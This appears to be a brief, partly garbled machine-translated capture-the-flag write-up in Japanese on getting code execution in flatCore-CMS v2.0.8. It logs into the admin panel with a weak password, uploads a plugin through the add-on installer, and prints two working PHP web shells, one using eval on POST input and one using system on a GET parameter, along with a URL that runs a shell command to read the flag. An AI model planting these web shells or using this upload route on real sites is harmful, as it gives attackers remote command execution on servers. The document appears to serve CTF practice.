目次
1. タイトル
ターゲットの紹介:
flatCore-CMS v2.0.8 にはバックグラウンドで任意のコードが実行される脆弱性があります
トピックを入力してください:
robots.txt ディレクトリ:
/acp 背景:
管理者/12345678
「アドオン」 -- 「Installieren」は新しいモジュールをアップロードします
1. 一文のトロイの木馬:
<?php @eval($_POST['cmd']);?>
アリの剣接続:
https://xxx.ichunqiu.com/upload/plugins/xxx.php
表示フラグ:
フラグ{a3b6c217-ec07-4f4b-9e4c-90580144fdd0}
2. コマンド実行型トロイの木馬:
<?php system($_GET[1]);phpinfo();?>
http://xxx.ichunqiu.com/upload/plugins/system.php?1=cat ///flag
フラグ{a3b6c217-ec07-4f4b-9e4c-90580144fdd0}